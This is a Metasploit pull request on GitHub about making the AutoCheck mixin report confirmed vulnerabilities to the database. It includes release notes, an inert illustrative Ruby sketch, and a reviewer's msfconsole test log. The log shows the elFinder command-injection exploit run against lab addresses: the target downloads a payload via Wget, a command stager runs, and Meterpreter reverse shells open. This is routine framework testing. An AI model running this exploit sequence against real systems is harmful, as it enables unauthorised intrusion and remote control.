Add autocheck report_vuln logic #20800
smcintyre-r7
left a comment
Changes look good. Ran through a quick test with an ELFinder exploit and everything worked as intended.
```
msf exploit(linux/http/elfinder_archive_cmd_injection) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable. elFinder running version 2.1.58
msf exploit(linux/http/elfinder_archive_cmd_injection) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2025-11-24 23:05:18 UTC 192.168.159.166 MSSQL Login Utility CVE-1999-0506
msf exploit(linux/http/elfinder_archive_cmd_injection) > set RHOSTS 19Interrupt: use the 'exit' command to quit
msf exploit(linux/http/elfinder_archive_cmd_injection) > set SRVHOST 1921.68.159.128
[-] The following options failed to validate: Value '1921.68.159.128' is not valid for option 'SRVHOST'.
SRVHOST => 0.0.0.0
msf exploit(linux/http/elfinder_archive_cmd_injection) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf exploit(linux/http/elfinder_archive_cmd_injection) > exploit
msf exploit(linux/http/elfinder_archive_cmd_injection) > exploit
[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
msf exploit(linux/http/elfinder_archive_cmd_injection) > set LHOST 192.168.159.129
LHOST => 192.168.159.129
msf exploit(linux/http/elfinder_archive_cmd_injection) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(linux/http/elfinder_archive_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.58
[*] Uploading file niWPN.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive KKJUJPudNg.zip
[+] Archive was successfully created!
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (192.168.159.128:8080).
[!] This exploit may require manual cleanup of 'niWPN.txt' on the target
[!] This exploit may require manual cleanup of 'KKJUJPudNg.zip' on the target
[*] Exploit completed, but no session was created.
msf exploit(linux/http/elfinder_archive_cmd_injection) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(linux/http/elfinder_archive_cmd_injection) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable. elFinder running version 2.1.58
msf exploit(linux/http/elfinder_archive_cmd_injection) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2025-11-24 23:05:18 UTC 192.168.159.166 MSSQL Login Utility CVE-1999-0506
2025-12-22 20:51:10 UTC 192.168.159.128 exploit/linux/http/elfinder_archive_cmd_injection CVE-2021-32682,URL-https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
msf exploit(linux/http/elfinder_archive_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.58
[*] Uploading file Gyqsku.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive mCyiNy.zip
[+] Archive was successfully created!
[*] Using URL: http://192.168.159.128:8081/VAijaLrGtX8lC
[*] Client 192.168.159.128 (Wget/1.20.1 (linux-gnu)) requested /VAijaLrGtX8lC
[*] Sending payload to 192.168.159.128 (Wget/1.20.1 (linux-gnu))
[*] Command Stager progress - 54.24% done (64/118 bytes)
[*] Command Stager progress - 72.88% done (86/118 bytes)
[*] Sending stage (1062760 bytes) to 192.168.159.128
[+] Deleted Gyqsku.txt
[+] Deleted mCyiNy.zip
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.128:56842) at 2025-12-22 15:51:27 -0500
[*] Command Stager progress - 83.90% done (99/118 bytes)
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.
meterpreter >
meterpreter >
meterpreter > exit
[*] Shutting down session: 1
[*] 192.168.159.128 - Meterpreter session 1 closed. Reason: User exit
msf exploit(linux/http/elfinder_archive_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.58
[*] Uploading file cErheNNdn.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive EZBxWebTqk.zip
[+] Archive was successfully created!
[*] Using URL: http://192.168.159.128:8081/G0eMumBodYumZty
[*] Client 192.168.159.128 (Wget/1.20.1 (linux-gnu)) requested /G0eMumBodYumZty
[*] Sending payload to 192.168.159.128 (Wget/1.20.1 (linux-gnu))
[*] Command Stager progress - 55.00% done (66/120 bytes)
[*] Command Stager progress - 73.33% done (88/120 bytes)
[*] Sending stage (1062760 bytes) to 192.168.159.128
[+] Deleted cErheNNdn.txt
[+] Deleted EZBxWebTqk.zip
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:42562) at 2025-12-22 15:51:52 -0500
[*] Command Stager progress - 84.17% done (101/120 bytes)
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter >
meterpreter > exit
[*] Shutting down session: 2
[*] 192.168.159.128 - Meterpreter session 2 closed. Reason: User exit
msf exploit(linux/http/elfinder_archive_cmd_injection) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2025-11-24 23:05:18 UTC 192.168.159.166 MSSQL Login Utility CVE-1999-0506
2025-12-22 20:51:10 UTC 192.168.159.128 exploit/linux/http/elfinder_archive_cmd_injection CVE-2021-32682,URL-https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
msf exploit(linux/http/elfinder_archive_cmd_injection) >
```
Release Notes

This updates the AutoCheck mixin that exploits use to automatically check for a vulnerability before proceeding with an exploit attempt. The update ensures that vulnerabilities that are identified by this check are reported to the database.

Modules that run a `check` before exploitation and are successful in identifying a vulnerability will now register a vulnerability with the identified host.

Verification

`vulns` and `vulns --verbose` command should output all details:

Before this change, in an empty workspace, no vuln or vuln attempts would be registered.

Note: This is an MVP implementation to bubble up the vulnerability reporting logic; we will still likely want an extra iteration to add the different metadata to the report_vuln logic to differentiate between check methods and exploit methods to the user, as well as some of the more specific CheckCode metadata.
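
As an added example (not code from this PR or from Metasploit), the Ruby sketch below models the behaviour the release notes describe: a prepended wrapper runs the module's `check` first and records a finding in a vulns table before the module body runs. `VulnStore`, `AutoCheckModel`, `DemoModule`, the set of reportable check results and the one-row-per-host-and-name rule are assumptions made for illustration; the last of these is chosen to match the single row for the module in the reviewer's final `vulns` listing.

```ruby
# Stand-alone model of a prepended auto-check wrapper (added illustration,
# not Metasploit source; class, module and method names are hypothetical).

# In-memory stand-in for the workspace's vulns table.
class VulnStore
  attr_reader :rows

  def initialize
    @rows = []
  end

  # Assumption: one row per host and name, so repeated runs add no duplicates.
  def report_vuln(host:, name:, refs:, info:)
    @rows.find { |r| r[:host] == host && r[:name] == name } ||
      (@rows << { host: host, name: name, refs: refs, info: info }).last
  end
end

# Prepended, so this #exploit runs before the module's own #exploit.
module AutoCheckModel
  # Assumption: only these check results are recorded as findings.
  REPORTABLE = %i[vulnerable appears].freeze

  def exploit
    code, detail = check
    return "aborted: #{code}" unless REPORTABLE.include?(code)
    store.report_vuln(host: rhost, name: fullname, refs: refs, info: detail)
    super
  end
end

# Constructed module: #check compares a version banner; #exploit is inert.
class DemoModule
  prepend AutoCheckModel
  attr_reader :store, :rhost

  def initialize(store, rhost, banner)
    @store, @rhost = store, rhost
    @version = banner.split('.').map(&:to_i)
  end

  def fullname; 'exploit/demo/placeholder'; end
  def refs; ['CVE-PLACEHOLDER']; end
  def check
    (@version <=> [1, 0, 0]) <= 0 ? [:appears, 'old version'] : [:safe, 'patched']
  end
  def exploit; 'module body reached'; end
end
```

Because the finding is written before `super` is called, a run that later fails for an unrelated reason still leaves the row in the table.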